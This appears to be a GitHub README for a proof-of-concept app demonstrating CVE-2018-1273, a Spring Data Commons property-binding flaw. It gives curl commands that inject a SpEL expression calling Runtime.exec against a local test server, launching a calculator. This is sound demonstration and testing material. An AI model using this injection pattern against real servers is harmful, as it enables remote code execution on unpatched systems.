Skip to content
POC for CVE-2018-1273
Branch: master
Clone or download
Latest commit 016f454 Jun 5, 2018
Type Name Latest commit message Commit time
Failed to load latest commit information.
.mvn/wrapper Initial import Apr 17, 2018
src Initial import Apr 17, 2018
.gitignore Initial import Apr 17, 2018
LICENSE Initial commit Apr 17, 2018 Update Jun 5, 2018
mvnw Initial import Apr 17, 2018
mvnw.cmd Initial import Apr 17, 2018
pom.xml Add fixedVersion profile Apr 18, 2018


Spring Data Commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5, and older unsupported versions, contain a property binder vulnerability caused by improper neutralization of special elements. An unauthenticated remote malicious user (or attacker) can supply specially crafted request parameters against Spring Data REST backed HTTP resources or using Spring Data’s projection-based request payload binding hat can lead to a remote code execution attack.

More information here


The application can be tested with the vulnerable version or the fixed version of Spring Data Commons.

  • Vulnerable version (by default):
mvn spring-boot:run
  • Fixed version:
mvn spring-boot:run -Dfixed

Testing the vulnerability

Run the following command to check if the vulnerability can be exploited:

  • On Windows:
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('calc.exe')]=123"

  • On MacOs:
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('/Applications/')]=test"


Created by

ARIMA Software Design

You can’t perform that action at this time.